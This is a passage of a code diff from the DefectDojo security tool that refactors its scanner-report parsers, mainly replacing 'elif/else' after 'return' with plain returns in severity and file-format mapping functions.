int(search.group(1)) + return None @staticmethod def convert_sonar_severity(sonar_severity): sev = sonar_severity.lower() if sev == "blocker": return "Critical" - elif sev == "critical": + if sev == "critical": return "High" - elif sev == "major": + if sev == "major": return "Medium" - elif sev == "minor": + if sev == "minor": return "Low" - else: - return "Info" + return "Info" @staticmethod def convert_scanner_confidence(sonar_scanner_confidence): sev = sonar_scanner_confidence.lower() if sev == "high": return 1 - elif sev == "medium": + if sev == "medium": return 4 - elif sev == "low": - return 7 - else: + if sev == "low": return 7 + return 7 @staticmethod def get_references(vuln_details): diff --git a/dojo/tools/api_sonarqube/updater.py b/dojo/tools/api_sonarqube/updater.py index 980079f8942..c8bcd7e0664 100644 --- a/dojo/tools/api_sonarqube/updater.py +++ b/dojo/tools/api_sonarqube/updater.py @@ -72,7 +72,7 @@ def get_sonarqube_required_transitions_for( ): # If current and target is the same... do nothing if current_status == target_status: - return + return None # Check if there is at least one transition from current_status... if not [ @@ -80,7 +80,7 @@ def get_sonarqube_required_transitions_for( for x in self.MAPPING_SONARQUBE_STATUS_TRANSITION if current_status in x.get("from") ]: - return + return None # Starting from target_status... 
find out possible origin statuses that # can transition to target_status @@ -113,6 +113,8 @@ def get_sonarqube_required_transitions_for( if possible_transition: transitions_result.extendleft(possible_transition) return list(transitions_result) + return None + return None def update_sonarqube_finding(self, finding): sonarqube_issue = finding.sonarqube_issue diff --git a/dojo/tools/api_vulners/importer.py b/dojo/tools/api_vulners/importer.py index 8ebbbe83f60..0b49306f7e9 100644 --- a/dojo/tools/api_vulners/importer.py +++ b/dojo/tools/api_vulners/importer.py @@ -16,13 +16,11 @@ class VulnersImporter: def get_findings(self, test): client, _config = self.prepare_client(test) - findings = client.get_findings() - return findings + return client.get_findings() def get_vulns_description(self, test, vulns_id): client, _config = self.prepare_client(test) - description = client.get_vulns_description(vulns_id) - return description + return client.get_vulns_description(vulns_id) def prepare_client(self, test): product = test.engagement.product diff --git a/dojo/tools/appspider/parser.py b/dojo/tools/appspider/parser.py index bf9ed6eb415..d6ccf54611c 100644 --- a/dojo/tools/appspider/parser.py +++ b/dojo/tools/appspider/parser.py @@ -18,7 +18,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename is None: - return + return None vscan = ElementTree.parse(filename) root = vscan.getroot() diff --git a/dojo/tools/aqua/parser.py b/dojo/tools/aqua/parser.py index 8dc92dd14d1..076c2d71dc5 100644 --- a/dojo/tools/aqua/parser.py +++ b/dojo/tools/aqua/parser.py @@ -204,22 +204,20 @@ def aqua_severity_of(score): return "High" if score == "medium": return "Medium" - elif score == "low": + if score == "low": return "Low" - elif score == "negligible": + if score == "negligible": return "Info" - else: - return "Critical" + return "Critical" def severity_of(score): if score == 0: return "Info" - elif score < 4: + if score < 4: return "Low" - elif 4.0 < score < 7.0: + if 4.0 < score < 7.0: return "Medium" - elif 7.0 < score < 9.0: + if 7.0 < score < 9.0: return "High" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/asff/parser.py b/dojo/tools/asff/parser.py index 74630290638..ccd5eb3110c 100644 --- a/dojo/tools/asff/parser.py +++ b/dojo/tools/asff/parser.py @@ -116,7 +116,7 @@ def get_findings(self, file, test): def get_severity(self, data): if data.get("Label"): return SEVERITY_MAPPING[data.get("Label")] - elif isinstance(data.get("Normalized"), int): + if isinstance(data.get("Normalized"), int): # 0 - INFORMATIONAL # 1-39 - LOW # 40-69 - MEDIUM @@ -124,12 +124,11 @@ def get_severity(self, data): # 90-100 - CRITICAL if data.get("Normalized") > 89: return "Critical" - elif data.get("Normalized") > 69: + if data.get("Normalized") > 69: return "High" - elif data.get("Normalized") > 39: + if data.get("Normalized") > 39: return "Medium" - elif data.get("Normalized") > 0: + if data.get("Normalized") > 0: return "Low" - else: - return "Info" + return "Info" return None diff --git a/dojo/tools/auditjs/parser.py b/dojo/tools/auditjs/parser.py index 8135fe1fc55..6299308f79c 100644 --- a/dojo/tools/auditjs/parser.py +++ b/dojo/tools/auditjs/parser.py @@ -25,14 +25,13 @@ def get_severity(self, cvss): cvss = float(cvss) if cvss > 0 and cvss < 4: return "Low" - elif cvss >= 4 and cvss < 7: + if cvss >= 4 and cvss < 7: return "Medium" - elif cvss >= 7 and cvss < 9: + if cvss >= 7 and cvss < 9: return "High" - elif cvss >= 9: + if cvss >= 9: return 
"Critical" - else: - return "Informational" + return "Informational" def get_findings(self, filename, test): try: diff --git a/dojo/tools/aws_prowler/parser.py b/dojo/tools/aws_prowler/parser.py index 8a084ff6f37..7093a596012 100644 --- a/dojo/tools/aws_prowler/parser.py +++ b/dojo/tools/aws_prowler/parser.py @@ -23,11 +23,10 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".csv"): return self.process_csv(file, test) - elif file.name.lower().endswith(".json"): + if file.name.lower().endswith(".json"): return self.process_json(file, test) - else: - msg = "Unknown file format" - raise ValueError(msg) + msg = "Unknown file format" + raise ValueError(msg) def process_csv(self, file, test): content = file.read() @@ -218,8 +217,7 @@ def process_json(self, file, test): def formatview(self, depth): if depth > 1: return "* " - else: - return "" + return "" # Criticality rating def getCriticalityRating(self, result, level, severity): @@ -233,10 +231,9 @@ def getCriticalityRating(self, result, level, severity): if severity == "Informational": return "Low" return severity + if level == "Level 1": + criticality = "Critical" else: - if level == "Level 1": - criticality = "Critical" - else: - criticality = "High" + criticality = "High" return criticality diff --git a/dojo/tools/aws_prowler_v3plus/parser.py b/dojo/tools/aws_prowler_v3plus/parser.py index 5d550dcf5c6..c764667dfb4 100644 --- a/dojo/tools/aws_prowler_v3plus/parser.py +++ b/dojo/tools/aws_prowler_v3plus/parser.py @@ -17,8 +17,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".ocsf.json"): return AWSProwlerV4Parser().process_ocsf_json(file, test) - elif file.name.lower().endswith(".json"): + if file.name.lower().endswith(".json"): return AWSProwlerV3Parser().process_json(file, test) - else: - msg = "Unknown file format" - raise ValueError(msg) + msg = "Unknown file format" + raise ValueError(msg) diff --git a/dojo/tools/azure_security_center_recommendations/parser.py b/dojo/tools/azure_security_center_recommendations/parser.py index 7fbfac83c91..9838f65ae58 100644 --- a/dojo/tools/azure_security_center_recommendations/parser.py +++ b/dojo/tools/azure_security_center_recommendations/parser.py @@ -22,9 +22,8 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".csv"): return self.process_csv(file, test) - else: - msg = "Unknown file format" - raise ValueError(msg) + msg = "Unknown file format" + raise ValueError(msg) def process_csv(self, file, test): content = file.read() diff --git a/dojo/tools/bandit/parser.py b/dojo/tools/bandit/parser.py index 1ad385114ac..3e4e54fcd8b 100644 --- a/dojo/tools/bandit/parser.py +++ b/dojo/tools/bandit/parser.py @@ -66,9 +66,8 @@ def get_findings(self, filename, test): def convert_confidence(self, value): if "high" == value.lower(): return 2 - elif "medium" == value.lower(): + if "medium" == value.lower(): return 3 - elif "low" == value.lower(): + if "low" == value.lower(): return 6 - else: - return None + return None diff --git a/dojo/tools/bearer_cli/parser.py b/dojo/tools/bearer_cli/parser.py index 4f91bb8632a..6484fd66269 100644 --- a/dojo/tools/bearer_cli/parser.py +++ b/dojo/tools/bearer_cli/parser.py @@ -29,8 +29,7 @@ def get_findings(self, file, test): if bearerfinding["fingerprint"] in dupes: continue - else: - dupes.add(bearerfinding["fingerprint"]) + 
dupes.add(bearerfinding["fingerprint"]) finding = Finding( title=bearerfinding["title"] + " in " + bearerfinding["filename"] + ":" + str(bearerfinding["line_number"]), diff --git a/dojo/tools/blackduck/importer.py b/dojo/tools/blackduck/importer.py index 3e7cde7abe7..80db2714490 100644 --- a/dojo/tools/blackduck/importer.py +++ b/dojo/tools/blackduck/importer.py @@ -24,8 +24,7 @@ def parse_findings(self, report: Path) -> Iterable[BlackduckFinding]: if zipfile.is_zipfile(str(report)): return self._process_zipfile(report) - else: - return self._process_csvfile(report) + return self._process_csvfile(report) def _process_csvfile(self, report): """ diff --git a/dojo/tools/blackduck/parser.py b/dojo/tools/blackduck/parser.py index a79e9db9677..d462f7207b3 100644 --- a/dojo/tools/blackduck/parser.py +++ b/dojo/tools/blackduck/parser.py @@ -28,10 +28,9 @@ def get_findings(self, filename, test): def normalize_findings(self, filename): importer = BlackduckImporter() - findings = sorted( + return sorted( importer.parse_findings(filename), key=lambda f: f.vuln_id, ) - return findings def ingest_findings(self, normalized_findings, test): dupes = {} diff --git a/dojo/tools/blackduck_binary_analysis/parser.py b/dojo/tools/blackduck_binary_analysis/parser.py index 7e545e67517..b9b2e6ab655 100644 --- a/dojo/tools/blackduck_binary_analysis/parser.py +++ b/dojo/tools/blackduck_binary_analysis/parser.py @@ -29,10 +29,9 @@ def get_findings(self, filename, test): def sort_findings(self, filename): importer = BlackduckBinaryAnalysisImporter() - findings = sorted( + return sorted( importer.parse_findings(filename), key=lambda f: f.cve, ) - return findings def ingest_findings(self, sorted_findings, test): findings = {} @@ -138,9 +137,7 @@ def format_description(self, i): return description def format_mitigation(self, i): - mitigation = f"Upgrade {str(i.component)} to latest version: {str(i.latest_version)}.\n" - - return mitigation + return f"Upgrade {str(i.component)} to latest version: {str(i.latest_version)}.\n" def format_impact(self, i): impact = "The use of vulnerable third-party open source software in applications can have numerous negative impacts:\n\n" diff --git a/dojo/tools/blackduck_component_risk/importer.py b/dojo/tools/blackduck_component_risk/importer.py index 5478fa0d51b..c33fa7fd671 100644 --- a/dojo/tools/blackduck_component_risk/importer.py +++ b/dojo/tools/blackduck_component_risk/importer.py @@ -29,9 +29,8 @@ def parse_findings(self, report: Path) -> (dict, dict, dict): report = Path(report.temporary_file_path()) if zipfile.is_zipfile(str(report)): return self._process_zipfile(report) - else: - msg = f"File {report} not a zip!" - raise ValueError(msg) + msg = f"File {report} not a zip!" 
+ raise ValueError(msg) def _process_zipfile(self, report: Path) -> (dict, dict, dict): """ diff --git a/dojo/tools/blackduck_component_risk/parser.py b/dojo/tools/blackduck_component_risk/parser.py index 60003fb4093..270b3481725 100644 --- a/dojo/tools/blackduck_component_risk/parser.py +++ b/dojo/tools/blackduck_component_risk/parser.py @@ -206,10 +206,9 @@ def security_title(self, vulns): :param vulns: Dictionary {component_version_identifier: [vulns]} :return: """ - title = "Security Risk: {}:{}".format( + return "Security Risk: {}:{}".format( vulns[0]["Component name"], vulns[0]["Component version name"], ) - return title def security_description(self, vulns): """ @@ -289,10 +288,9 @@ def security_mitigation(self, vulns): :param vulns: Dictionary {component_version_identifier: [vulns]} :return: """ - mit = "Update component {}:{} to a secure version".format( + return "Update component {}:{} to a secure version".format( vulns[0]["Component name"], vulns[0]["Component version name"], ) - return mit def security_impact(self, vulns): """ diff --git a/dojo/tools/burp_api/parser.py b/dojo/tools/burp_api/parser.py index ec801d8e285..c54726f384e 100644 --- a/dojo/tools/burp_api/parser.py +++ b/dojo/tools/burp_api/parser.py @@ -159,9 +159,8 @@ def convert_confidence(issue): value = issue.get("confidence", "undefined").lower() if "certain" == value: return 2 - elif "firm" == value: + if "firm" == value: return 3 - elif "tentative" == value: + if "tentative" == value: return 6 - else: - return None + return None diff --git a/dojo/tools/burp_enterprise/parser.py b/dojo/tools/burp_enterprise/parser.py index b652dda32c9..aab8e565242 100644 --- a/dojo/tools/burp_enterprise/parser.py +++ b/dojo/tools/burp_enterprise/parser.py @@ -23,8 +23,7 @@ def get_findings(self, filename, test): tree = etree.parse(filename, parser) if tree: return self.get_items(tree, test) - else: - return () + return () def get_content(self, container): s = "" @@ -193,8 +192,7 @@ def get_cwe(self, vuln_references): cweSearch = re.search("CWE-([0-9]*)", vuln_references, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 def create_findings(self, items, test): # Dictonary to hold the aggregated findings with: diff --git a/dojo/tools/burp_graphql/parser.py b/dojo/tools/burp_graphql/parser.py index c0266941222..9b37760e2a8 100644 --- a/dojo/tools/burp_graphql/parser.py +++ b/dojo/tools/burp_graphql/parser.py @@ -222,5 +222,4 @@ def get_cwe(self, cwe_html): cweSearch = re.search("CWE-([0-9]*)", cwe_html, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 diff --git a/dojo/tools/checkmarx/parser.py b/dojo/tools/checkmarx/parser.py index 02e242c0d12..c278612344e 100644 --- a/dojo/tools/checkmarx/parser.py +++ b/dojo/tools/checkmarx/parser.py @@ -21,8 +21,7 @@ def get_label_for_scan_types(self, scan_type): def get_description_for_scan_types(self, scan_type): if scan_type == "Checkmarx Scan": return "Simple Report. Aggregates vulnerabilities per categories, cwe, name, sinkFilename" - else: - return "Detailed Report. Import all vulnerabilities from checkmarx without aggregation" + return "Detailed Report. 
Import all vulnerabilities from checkmarx without aggregation" # mode: # None (default): aggregates vulnerabilites per sink filename (legacy behavior) @@ -333,8 +332,7 @@ def get_description_detailed(self, pathnode, findingdetail): codefragment.find("Code").text.strip(), ) - findingdetail = f"{findingdetail}-----\n" - return findingdetail + return f"{findingdetail}-----\n" # Get name, cwe and categories from the global query tag (1 query = 1 type # of vulnerability) @@ -362,16 +360,14 @@ def isVerified(self, state): def get_findings(self, file, test): if file.name.strip().lower().endswith(".json"): return self._get_findings_json(file, test) - else: - return self._get_findings_xml(file, test) + return self._get_findings_xml(file, test) def _parse_date(self, value): if isinstance(value, str): return parser.parse(value).date() - elif isinstance(value, dict) and isinstance(value.get("seconds"), int): + if isinstance(value, dict) and isinstance(value.get("seconds"), int): return datetime.datetime.utcfromtimestamp(value.get("seconds")).date() - else: - return None + return None def _get_findings_json(self, file, test): """""" diff --git a/dojo/tools/checkmarx_one/parser.py b/dojo/tools/checkmarx_one/parser.py index 64c52c763f1..a48023e5d6f 100644 --- a/dojo/tools/checkmarx_one/parser.py +++ b/dojo/tools/checkmarx_one/parser.py @@ -22,22 +22,19 @@ def get_description_for_scan_types(self, scan_type): def _parse_date(self, value): if isinstance(value, str): return parser.parse(value) - elif isinstance(value, dict) and isinstance(value.get("seconds"), int): + if isinstance(value, dict) and isinstance(value.get("seconds"), int): return datetime.datetime.utcfromtimestamp(value.get("seconds")) - else: - return None + return None def _parse_cwe(self, cwe): if isinstance(cwe, str): cwe_num = re.findall(r"\d+", cwe) if cwe_num: return cwe_num[0] - else: - return None - elif isinstance(cwe, int): - return cwe - else: return None + if isinstance(cwe, int): + return cwe + return None def parse_vulnerabilities_from_scan_list( self, @@ -114,8 +111,7 @@ def parse_sca_vulnerabilities( cwe_store: list, ) -> List[Finding]: # Not implemented yet - findings = [] - return findings + return [] def parse_sast_vulnerabilities( self, diff --git a/dojo/tools/chefinspect/parser.py b/dojo/tools/chefinspect/parser.py index 06769d4d033..aeb256345e1 100644 --- a/dojo/tools/chefinspect/parser.py +++ b/dojo/tools/chefinspect/parser.py @@ -17,14 +17,13 @@ def convert_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 0.4: + if val < 0.4: return "Low" - elif val < 0.7: + if val < 0.7: return "Medium" - elif val < 0.9: + if val < 0.9: return "High" - else: - return "Critical" + return "Critical" def get_findings(self, file, test): lines = file.read() diff --git a/dojo/tools/clair/clairklar_parser.py b/dojo/tools/clair/clairklar_parser.py index efef6483d58..bc168fbabab 100644 --- a/dojo/tools/clair/clairklar_parser.py +++ b/dojo/tools/clair/clairklar_parser.py @@ -79,7 +79,7 @@ def get_item_clairklar(self, item_node, test): if "Link" in item_node: link = item_node["Link"] - finding = Finding( + return Finding( title=item_node["Name"] + " - " + "(" @@ -101,4 +101,3 @@ def get_item_clairklar(self, item_node, test): dynamic_finding=False, impact="No impact provided", ) - return finding diff --git a/dojo/tools/clair/parser.py b/dojo/tools/clair/parser.py index 8b82aa8ec6b..99bf78729c0 100644 --- a/dojo/tools/clair/parser.py +++ b/dojo/tools/clair/parser.py @@ -19,10 +19,10 @@ def get_findings(self, 
json_output, test): if tree: if self.scanner == "clair": return ClairScan().get_items_clair(tree, test) - elif self.scanner == "clairklar": + if self.scanner == "clairklar": return ClairKlarScan().get_items_klar(tree, test) - else: - return [] + return None + return [] def parse_json(self, json_output): try: diff --git a/dojo/tools/cloudsploit/parser.py b/dojo/tools/cloudsploit/parser.py index 7ad446bcf74..ccf3181aa1d 100644 --- a/dojo/tools/cloudsploit/parser.py +++ b/dojo/tools/cloudsploit/parser.py @@ -75,5 +75,4 @@ def convert_severity(self, status): return "Medium" if status == "FAIL": return "Critical" - else: - return "Info" + return "Info" diff --git a/dojo/tools/codechecker/parser.py b/dojo/tools/codechecker/parser.py index 41998099e56..5e96c75be35 100644 --- a/dojo/tools/codechecker/parser.py +++ b/dojo/tools/codechecker/parser.py @@ -19,11 +19,12 @@ def get_requires_file(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree) + return None def parse_json(self, json_output): data = json_output.read() @@ -99,7 +100,7 @@ def get_item(vuln): else: title = unique_id_from_tool - finding = Finding( + return Finding( title=title, description=description, severity=severity, @@ -119,8 +120,6 @@ def get_item(vuln): ], ) - return finding - def get_mapped_severity(severity): switcher = { diff --git a/dojo/tools/contrast/parser.py b/dojo/tools/contrast/parser.py index fb31316e5f1..97e8fbf641e 100644 --- a/dojo/tools/contrast/parser.py +++ b/dojo/tools/contrast/parser.py @@ -124,8 +124,7 @@ def format_description(self, row): + row.get("Vulnerability Name") + "\n" ) - description = description + "**Status:** " + row.get("Status") + "\n" - return description + return description + "**Status:** " + row.get("Status") + "\n" def format_cwe(self, url): # Get the last path diff --git a/dojo/tools/crashtest_security/parser.py b/dojo/tools/crashtest_security/parser.py index 2c118d84665..71278115ecb 100644 --- a/dojo/tools/crashtest_security/parser.py +++ b/dojo/tools/crashtest_security/parser.py @@ -131,14 +131,13 @@ def get_severity(self, cvss_base_score): """ if cvss_base_score == 0: return "Info" - elif cvss_base_score < 4: + if cvss_base_score < 4: return "Low" - elif cvss_base_score < 7: + if cvss_base_score < 7: return "Medium" - elif cvss_base_score < 9: + if cvss_base_score < 9: return "High" - else: - return "Critical" + return "Critical" class CrashtestSecurityXmlParser: @@ -153,8 +152,7 @@ def get_findings(self, xml_output, test): if tree: return self.get_items(tree, test) - else: - return [] + return [] def parse_xml(self, xml_output): """ @@ -244,8 +242,7 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return CrashtestSecurityXmlParser().get_findings(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return CrashtestSecurityJsonParser().get_findings(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/crunch42/parser.py b/dojo/tools/crunch42/parser.py index 02868e45b55..d4d19ff35e4 100644 --- a/dojo/tools/crunch42/parser.py +++ b/dojo/tools/crunch42/parser.py @@ -38,8 +38,7 @@ def get_findings(self, filename, test): for moduleTree in reportTree: temp += self.process_tree(moduleTree, test) return temp - else: - return self.process_tree(reportTree, test) + return 
self.process_tree(reportTree, test) def get_items(self, tree, test): items = {} @@ -72,7 +71,7 @@ def get_item(self, issue, title, test): else: severity = "Critical" # create the finding object - finding = Finding( + return Finding( unique_id_from_tool=fingerprint, title=title, test=test, @@ -87,4 +86,3 @@ def get_item(self, issue, title, test): static_finding=True, dynamic_finding=False, ) - return finding diff --git a/dojo/tools/cyclonedx/json_parser.py b/dojo/tools/cyclonedx/json_parser.py index 265b5e02872..6a329cfdfa7 100644 --- a/dojo/tools/cyclonedx/json_parser.py +++ b/dojo/tools/cyclonedx/json_parser.py @@ -144,4 +144,4 @@ def _flatten_components(self, components, flatted_components): # tools don't provide it if "bom-ref" in component: flatted_components[component["bom-ref"]] = component - return None + return diff --git a/dojo/tools/cyclonedx/parser.py b/dojo/tools/cyclonedx/parser.py index 8fe80a51136..d01798e3583 100644 --- a/dojo/tools/cyclonedx/parser.py +++ b/dojo/tools/cyclonedx/parser.py @@ -20,5 +20,4 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.strip().lower().endswith(".json"): return CycloneDXJSONParser()._get_findings_json(file, test) - else: - return CycloneDXXMLParser()._get_findings_xml(file, test) + return CycloneDXXMLParser()._get_findings_xml(file, test) diff --git a/dojo/tools/deepfence_threatmapper/compliance.py b/dojo/tools/deepfence_threatmapper/compliance.py index 5cd4f5b6340..f948a18c929 100644 --- a/dojo/tools/deepfence_threatmapper/compliance.py +++ b/dojo/tools/deepfence_threatmapper/compliance.py @@ -32,7 +32,7 @@ def get_findings(self, row, headers, test): description += "**test_number:** " + str(test_number) + "\n" description += "**count:** " + str(count) + "\n" description += "**doc_id:** " + str(doc_id) + "\n" - finding = Finding( + return Finding( title="Threatmapper_Compliance_Report-" + test_number, description=description, severity=self.compliance_severity(status), @@ -40,7 +40,6 @@ def get_findings(self, row, headers, test): dynamic_finding=True, test=test, ) - return finding def compliance_severity(self, input): if input == "pass": diff --git a/dojo/tools/deepfence_threatmapper/malware.py b/dojo/tools/deepfence_threatmapper/malware.py index f1931e42623..f764a2ce4b0 100644 --- a/dojo/tools/deepfence_threatmapper/malware.py +++ b/dojo/tools/deepfence_threatmapper/malware.py @@ -21,7 +21,7 @@ def get_findings(self, row, headers, test): description += "**NodeType:** " + str(NodeType) + "\n" description += "**Container Name:** " + str(Container_Name) + "\n" description += "**Kubernetes Cluster Name:** " + str(Kubernetes_Cluster_Name) + "\n" - finding = Finding( + return Finding( title=Rule_Name, description=description, file_path=File_Name, @@ -30,10 +30,8 @@ def get_findings(self, row, headers, test): dynamic_finding=True, test=test, ) - return finding def severity(self, input): if input is None: return "Info" - else: - return input.capitalize() + return input.capitalize() diff --git a/dojo/tools/deepfence_threatmapper/secret.py b/dojo/tools/deepfence_threatmapper/secret.py index fd102be834a..2eae14bc76b 100644 --- a/dojo/tools/deepfence_threatmapper/secret.py +++ b/dojo/tools/deepfence_threatmapper/secret.py @@ -38,5 +38,4 @@ def get_findings(self, row, headers, test): def severity(self, input): if input is None: return "Info" - else: - return input.capitalize() + return input.capitalize() diff --git a/dojo/tools/deepfence_threatmapper/vulnerability.py 
b/dojo/tools/deepfence_threatmapper/vulnerability.py index 61c1e505cdc..b76505613af 100644 --- a/dojo/tools/deepfence_threatmapper/vulnerability.py +++ b/dojo/tools/deepfence_threatmapper/vulnerability.py @@ -29,7 +29,7 @@ def get_findings(self, row, headers, test): description += "**host_name:** " + str(host_name) + "\n" description += "**cloud_account_id:** " + str(cloud_account_id) + "\n" description += "**masked:** " + str(masked) + "\n" - finding = Finding( + return Finding( title="Threatmapper_Vuln_Report-" + cve_id, description=description, component_name=cve_caused_by_package, @@ -41,10 +41,8 @@ def get_findings(self, row, headers, test): cve=cve_id, test=test, ) - return finding def severity(self, input): if input is None: return "Info" - else: - return input.capitalize() + return input.capitalize() diff --git a/dojo/tools/dependency_check/parser.py b/dojo/tools/dependency_check/parser.py index 96940049984..1d4a167429d 100644 --- a/dojo/tools/dependency_check/parser.py +++ b/dojo/tools/dependency_check/parser.py @@ -46,12 +46,11 @@ def get_filename_and_path_from_dependency( return related_dependency.findtext( f"{namespace}fileName", ), related_dependency.findtext(f"{namespace}filePath") - else: - # without filename, it would be just a duplicate finding so we have to skip it. filename - # is only present for relateddependencies since v6.0.0 - # logger.debug('related_dependency: %s', - # ElementTree.tostring(related_dependency, encoding='utf8', method='xml')) - return None, None + # without filename, it would be just a duplicate finding so we have to skip it. filename + # is only present for relateddependencies since v6.0.0 + # logger.debug('related_dependency: %s', + # ElementTree.tostring(related_dependency, encoding='utf8', method='xml')) + return None, None def get_component_name_and_version_from_dependency( self, dependency, related_dependency, namespace, diff --git a/dojo/tools/dependency_track/parser.py b/dojo/tools/dependency_track/parser.py index 2e3467623f9..eecc09670a3 100644 --- a/dojo/tools/dependency_track/parser.py +++ b/dojo/tools/dependency_track/parser.py @@ -92,16 +92,15 @@ def _convert_dependency_track_severity_to_dojo_severity(self, dependency_track_s severity = dependency_track_severity.lower() if severity == "critical": return "Critical" - elif severity == "high": + if severity == "high": return "High" - elif severity == "medium": + if severity == "medium": return "Medium" - elif severity == "low": + if severity == "low": return "Low" - elif severity.startswith("info"): + if severity.startswith("info"): return "Informational" - else: - return None + return None def _convert_dependency_track_finding_to_dojo_finding(self, dependency_track_finding, test): """ diff --git a/dojo/tools/dockerbench/parser.py b/dojo/tools/dockerbench/parser.py index 120da8eb6fc..c8aa321f7b2 100644 --- a/dojo/tools/dockerbench/parser.py +++ b/dojo/tools/dockerbench/parser.py @@ -111,7 +111,7 @@ def get_item(vuln, test, test_start, test_end, description): vuln["remediation-impact"], ) - finding = Finding( + return Finding( title=title, date=datetime.fromtimestamp(int(test_end)), test=test, @@ -122,5 +122,3 @@ def get_item(vuln, test, test_start, test_end, description): static_finding=True, dynamic_finding=False, ) - - return finding diff --git a/dojo/tools/drheader/parser.py b/dojo/tools/drheader/parser.py index 158da541bd3..bf8435f63ab 100644 --- a/dojo/tools/drheader/parser.py +++ b/dojo/tools/drheader/parser.py @@ -50,7 +50,6 @@ def get_findings(self, filename, test): for finding in 
item["report"]: items.append(self.return_finding(test=test, finding=finding, url=url)) return items - else: - for finding in data: - items.append(self.return_finding(test=test, finding=finding)) - return items + for finding in data: + items.append(self.return_finding(test=test, finding=finding)) + return items diff --git a/dojo/tools/eslint/parser.py b/dojo/tools/eslint/parser.py index 9e282cca41d..329e2fac751 100644 --- a/dojo/tools/eslint/parser.py +++ b/dojo/tools/eslint/parser.py @@ -16,10 +16,9 @@ def get_description_for_scan_types(self, scan_type): def _convert_eslint_severity_to_dojo_severity(self, eslint_severity): if eslint_severity == 2: return "High" - elif eslint_severity == 1: + if eslint_severity == 1: return "Medium" - else: - return "Info" + return "Info" def get_findings(self, filename, test): tree = filename.read() diff --git a/dojo/tools/fortify/parser.py b/dojo/tools/fortify/parser.py index b6f7e5185c8..7d2b15c0e25 100644 --- a/dojo/tools/fortify/parser.py +++ b/dojo/tools/fortify/parser.py @@ -15,8 +15,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if str(filename.name).endswith(".xml"): return FortifyXMLParser().parse_xml(filename, test) - elif str(filename.name).endswith(".fpr"): + if str(filename.name).endswith(".fpr"): return FortifyFPRParser().parse_fpr(filename, test) - else: - msg = "Filename extension not recognized. Use .xml or .fpr" - raise ValueError(msg) + msg = "Filename extension not recognized. Use .xml or .fpr" + raise ValueError(msg) diff --git a/dojo/tools/generic/csv_parser.py b/dojo/tools/generic/csv_parser.py index 001ea2ad91f..4e8acb461d9 100644 --- a/dojo/tools/generic/csv_parser.py +++ b/dojo/tools/generic/csv_parser.py @@ -105,5 +105,4 @@ def _convert_bool(self, val): def get_severity(self, input): if input in ["Info", "Low", "Medium", "High", "Critical"]: return input - else: - return "Info" + return "Info" diff --git a/dojo/tools/generic/parser.py b/dojo/tools/generic/parser.py index e2fb66086bb..cf03d9753bc 100644 --- a/dojo/tools/generic/parser.py +++ b/dojo/tools/generic/parser.py @@ -20,12 +20,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename.name.lower().endswith(".csv"): return GenericCSVParser()._get_findings_csv(filename) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): data = json.load(filename) test_internal = GenericJSONParser()._get_test_json(data) return test_internal.findings - else: # default to CSV like before - return GenericCSVParser()._get_findings_csv(filename) + # default to CSV like before + return GenericCSVParser()._get_findings_csv(filename) def get_tests(self, scan_type, filename): # if the file is a CSV just use the old function diff --git a/dojo/tools/github_vulnerability/parser.py b/dojo/tools/github_vulnerability/parser.py index b03dbc01e5d..c0ad99ac9a4 100644 --- a/dojo/tools/github_vulnerability/parser.py +++ b/dojo/tools/github_vulnerability/parser.py @@ -131,7 +131,7 @@ def get_findings(self, filename, test): else: dupes[dupe_key] = finding return list(dupes.values()) - elif isinstance(data, list): + if isinstance(data, list): findings = [] for vuln in data: url = vuln["url"] @@ -185,6 +185,7 @@ def get_findings(self, filename, test): ) findings.append(finding) return findings + return None def _search_vulnerability_alerts(self, data): if isinstance(data, list): @@ -204,5 +205,4 @@ def _search_vulnerability_alerts(self, data): def _convert_security(self, 
val): if val.lower() == "moderate": return "Medium" - else: - return val.title() + return val.title() diff --git a/dojo/tools/gitlab_dep_scan/parser.py b/dojo/tools/gitlab_dep_scan/parser.py index 2ec561500cd..cc365c8acba 100644 --- a/dojo/tools/gitlab_dep_scan/parser.py +++ b/dojo/tools/gitlab_dep_scan/parser.py @@ -15,11 +15,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) + return None def parse_json(self, json_output): try: diff --git a/dojo/tools/gitlab_sast/parser.py b/dojo/tools/gitlab_sast/parser.py index f4d169b2059..ebe5071ce6e 100644 --- a/dojo/tools/gitlab_sast/parser.py +++ b/dojo/tools/gitlab_sast/parser.py @@ -18,11 +18,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree) + return None def get_tests(self, scan_type, handle): tree = self.parse_json(handle) diff --git a/dojo/tools/harbor_vulnerability/parser.py b/dojo/tools/harbor_vulnerability/parser.py index c70c7031a5c..b1f2ab23633 100644 --- a/dojo/tools/harbor_vulnerability/parser.py +++ b/dojo/tools/harbor_vulnerability/parser.py @@ -105,5 +105,4 @@ def get_findings(self, filename, test): def transpose_severity(severity): if severity in Finding.SEVERITIES: return severity - else: - return "Info" + return "Info" diff --git a/dojo/tools/hcl_appscan/parser.py b/dojo/tools/hcl_appscan/parser.py index 00124b3f6c4..eaff922e2e8 100644 --- a/dojo/tools/hcl_appscan/parser.py +++ 